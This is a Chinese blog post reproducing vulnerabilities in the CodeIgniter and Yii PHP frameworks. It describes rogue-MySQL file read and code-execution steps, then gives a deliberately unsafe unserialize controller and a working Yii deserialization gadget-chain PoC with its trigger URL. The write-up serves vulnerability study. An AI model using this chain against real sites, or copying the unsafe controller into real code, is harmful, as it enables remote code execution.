CodeIgniter及Yii 漏洞合集

最新推荐文章于 2024-05-13 00:22:59 发布
最新推荐文章于 2024-05-13 00:22:59 发布
阅读量4.9k 收藏
点赞数
分类专栏: 框架漏洞 文章标签: php 框架漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/119800202
版权
本文详细介绍了CodeIgniter的反序列化漏洞,包括如何利用rogue_mysql_server.py脚本实现任意文件读取,以及通过配置POC文件进行攻击。同时,文章还探讨了CodeIgniter的任意代码执行漏洞,展示了如何构造命令进行利用。此外,文章还涉及了Yii框架的反序列化漏洞,提供了一个复现漏洞的示例,包括创建特定的Controller和poc.php文件,以及如何触发漏洞。
摘要由CSDN通过智能技术生成

CodeIgniter漏洞

CodeIgniter 反序列化漏洞

一、任意文件读取

需要用到的rogue_mysql_server.py脚本GitHub:https://github.com/Gifts/Rogue-MySql-Server

  1. 配置POC文件

配置恶意Mysql主机IP(攻击者外网IP):

  1. 配置py脚本

配置完毕后攻击机上运行py脚本

生成payload

 攻击受害机的反序例化点

 读取到C:/Windows/win.ini的内容

 CodeIgniter 任意代码执行漏洞

搭建好环境

构建命令语句

 

当开启了远程文件包含的情况下,也可以直接包含php://input

Yii漏洞

Yii 反序例化漏洞

漏洞复现

这是一个反序列化利用链,所以还需要一个反序列化的入口点

在controllers目录下创建一个Controller:


<?php
namespace app\controllers;
use Yii;
use yii\web\Controller;
use yii\filters\VervFilter;
use yii\filters\AccessControl;
use app\models\LoginForm;
 
class TestController extends \yii\web\Controller
{
    public function actionSss($data){
        return unserialize(base64_decode($data));
    }
}
 
?>

接着创建文件poc.php

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;
 
        public function __construct(){
            $this->checkAccess = 'phpinfo';
            $this->id = '1';
        }
    }
}
 
namespace Faker{
    use yii\rest\CreateAction;
 
    class Generator{
        protected $formatters;
 
        public function __construct(){
            $this->formatters['close'] = [new CreateAction(), 'run'];
        }
    }
}
 
namespace yii\db{
    use Faker\Generator;
 
    class BatchQueryResult{
        private $_dataReader;
 
        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>

执行文件获取poc

php poc.php

http://localhost:8080/index.php?r=test/sss&data=[payload](需要编码)

 

xzhome
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Codeigniter利用加密Key(密钥)的对象注入漏洞
01-30
大家好,Codeigniter是我最喜爱的PHP框架之一。和别人一样,我在这个框架中学习了PHP MVC编程。今天,我决定来分析一下CodeigniterPHP对象注入漏洞。我在接下来的叙述中会把重点放在Codeigniter的Session会话机制上。所有我将会分析的method方法都在CodeIgniter/system/libraries/Session.php文件里。我在本研究过程中使用的是Codeigniter 2.1版本。0x01CodeigniterSess
ref:CodeIgniter框架内核设计缺陷可能导致任意代码执行
weixin_30644369的博客
06-26 380
ref:https://www.seebug.org/vuldb/ssvid-96217 简要描述: 为准备乌云深圳沙龙,准备几个0day做案例。 官方承认这个问题,说明会发布补丁,但不愿承认这是个『漏洞』……不过也无所谓,反正是不是都没美刀~ 详细说明: CI在加载模板的时候,会调用 $this->load->view('template_name', $data)...
Goby 漏洞发布|天擎终端安全管理系统 YII_CSRF_TOKEN 远程代码执行漏洞_奇安信天擎漏洞(1)
最新发布
2401_84302761的博客
05-13 907
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
任意代码执行漏洞复现
kali_Ma的博客
11-20 1152
在 PostgreSQL 数据库的 jdbc 驱动程序中发现一个安全漏洞。当攻击者控制 jdbc url 或者属性时,使用 PostgreSQL 数据库的系统将受到攻击。pgjdbc 根据通过、、、sslfactory、连接属性提供类名实例化插件实例。但是,驱动程序在实例化类之前没有验证类是否实现了预期的接口。这可能导致通过任意类加载远程代码执行。
CodeIgniter4.x反序列化漏洞
小小猪的博客
11-10 2963
CodeIgniter4.x反序列化漏洞 CodeIgniter介绍: CodeIgniter 是一个为用 PHP 编写网络应用程序的人员提供的工具包。它的目标是实现让你比从零开始编写代码更快速地开发项目,为此,CI 提供了一套丰富的类库来满足通常的任务需求,并且提供了一个简单的接口和逻辑结构来调用这些库。CodeIgniter 可以将需要完成的任务代码量最小化,这样你就可以把更多的精力放到项目的开发上了。 漏洞介绍: 因部分函数过滤不合理,联合导致漏洞形成。CI框架建立于PHP>=7.2版本
PHP常用框架漏洞
小小猪的博客
08-14 2957
PHP常用框架漏洞 PHP框架 laraval介绍: Laravel基于MVC架构,可以满足诸如事件处理、用户身份验证等各种需求,同时通过包管理实现模块化和可扩展的代码,并且对数据库管理有着健壮的支持。 漏洞: 1. Laravel 配置文件泄露 2. Laravel <= 8.4.2 存在远程代码执行漏洞 3. Laravel 存在SQL注入漏洞 4. Laravel 反序列化漏洞 CakePHP 介绍: ...
php ci框架漏洞,CodeIgniter框架内核设计缺陷可能导致任意代码执行
weixin_42431577的博客
04-12 1625
### 简要描述:为准备乌云深圳沙龙,准备几个0day做案例。官方承认这个问题,说明会发布补丁,但不愿承认这是个『漏洞』……不过也无所谓,反正是不是都没美刀~### 详细说明:CI在加载模板的时候,会调用 $this->load->view('template_name', $data);内核中,查看view函数源码:/system/core/Loader.php```public f...
藏经阁WEB框架0day漏洞的发掘及分析经验分享.pdf
09-04
《藏经阁WEB框架0day漏洞的发掘及分析经验分享》 在网络安全领域,Web框架是构建动态网站、网络应用程序及网络服务的基础。本讲座主要围绕Web框架的0day漏洞发掘与分析,由Web应用安全和数据库安全领域的专家郑国祥...
WEB框架0day漏洞的发掘及分析经验分享.pdf
09-11
《WEB框架0day漏洞的发掘及分析经验分享》 在当今的互联网环境中,Web框架扮演着至关重要的角色,它们为开发者提供了便捷的开发环境,但同时也成为网络安全的一大关注点。0day漏洞,即未公开且未修复的漏洞,对Web...
关于PHP开发框架.pdf
09-30
常见的PHP框架有Laravel、Symfony、CodeIgniterYii、CakePHP等,它们各有特色,适合不同类型的项目和开发者偏好。在选择框架时,建议开发者根据项目需求和个人经验进行比较和测试,以确定最合适的框架。 总之,...
PHP实例开发源码-杰奇小说评分插件.zip
11-23
2. **Web开发框架**:杰奇小说系统可能基于某个PHP框架构建,如Laravel、CodeIgniterYii等,熟悉相关框架的API和架构对于理解插件工作原理至关重要。 3. **数据库操作**:插件可能使用MySQL等关系型数据库存储用户...
关于Yii2框架跑脚本时内存泄漏问题的分析与解决
12-20
现象 在跑 edu_ocr_img 表的归档时,每跑几万个数据,都会报一次内存耗尽 PHP Fatal error:  Allowed memory size of 134217728 bytesexhausted (tried toallocate 135168 bytes) 跟踪代码发现,是在插入时以下代码造成的: EduOCRTaskBackup::getDb()->createCommand()->batchInsert(EduOCRTaskBackup::tableName(), $fields, $data)->execute(); execute 之后会造成使用内存
基于PHP的建站管家多语言企业建站系统源码.zip
10-14
1. **框架和核心库**:如index.php作为入口文件,控制器、模型、视图等文件,以及PHP框架(如Laravel, CodeIgniter, Yii等)的相关组件。 2. **多语言支持**:语言包文件(如lang文件夹),用于存储不同语言的文本...
任意文件下载漏洞的利用思考
C20220511的博客
12-20 1211
需要说明的是,并不是所有的tomcat项目的controller源码都能在WEB-INF/classes/目录下找到,还有部分系统会把逻辑代码写到jar包中并放在WEB-INF/lib/目录下,如图3.8所示,某系统在classes目录下不存在任何class文件,所有的逻辑均在WEB-INF/*.jar包中。在CodeIgniter框架中,如果Cookie中包含了序列化的内容,如图4.3所示,则代表可以通过任意文件读取获取加密key来构造反序列化过程,结合框架本身的反序列化利用链,则可能造成反序列化漏洞
Codeigniter 利用加密Key(密钥)的对象注入漏洞
收集盒 Book box
09-10 1375
原文链接:http://www.mehmetince.net/codeigniter-object-injection-vulnerability-via-encryption-key/ 0x00 背景 大家好,Codeigniter 是我最喜爱的PHP框架之一。和别人一样,我在这个框架中学习了PHP MVC编程。今天,我决定来分析一下CodeigniterPHP 对象注入漏洞。 我在
(43.1)【web应用漏洞发现】漏洞平台、开发框架、CMS漏扫工具
04-29 4591
【专题】web应用漏洞发现
Yii之ActiveRecord内存泄漏问题
lyl198659的专栏
07-16 1591
Yii的CActiveRecord会造成内存泄漏,ActiveRecord对象使用完以后不会被unset,所以在跑大数据量的命令行脚本时最好用原声的数组形式: $db = Yii::app()->db; $results= $db->createCommand($sql)->queryAll(); 这样变量用完之后会被垃圾回收掉,不会造成内存泄漏
php yii2 使用命令行模式开启脚本 报错 :Error while sending QUERY packet. PID=xxx
weixin_30824599的博客
09-04 947
背景:使用Yii2命令行模式开启脚本监控rabbitmq队列(或使用nohup &命令后台监控接口),当队列有订单信息,执行查询,更新操作(相当于PHP文件写个查询,更新,使用命令行启动) 问题:一开始监控没有问题,每过一段时间会抛出错误 > Error while sending QUERY packet. PID=25370. The SQL being executed...
codeigniter post
08-16
CodeIgniter框架中,获取POST参数可以使用$_POST['key']来获取。此外,CodeIgniter还封装了一个Input类,可以使用$this->input->post('key')来获取POST提交过来的数据。例如,可以使用以下代码来获取POST参数: $key = $_POST['key']; 或者 $key = $this->input->post('key'); 其中,'key'是要获取的POST参数的键名。这样就可以获取到相应的POST参数了。 另外,CodeIgniter还提供了获取GET参数的方法。可以使用$this->input->get('key')来获取GET参数。这样可以方便地获取到URL中的GET参数。 总结起来,CodeIgniter框架中可以通过$_POST['key']、$this->input->post('key')获取POST参数,通过$this->input->get('key')获取GET参数。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [CI框架获取post和get参数_CodeIgniter心得](https://blog.csdn.net/lishk314/article/details/48240607)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [在CodeIgniter中检索JSON POST数据](https://blog.csdn.net/weixin_39954674/article/details/115108581)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值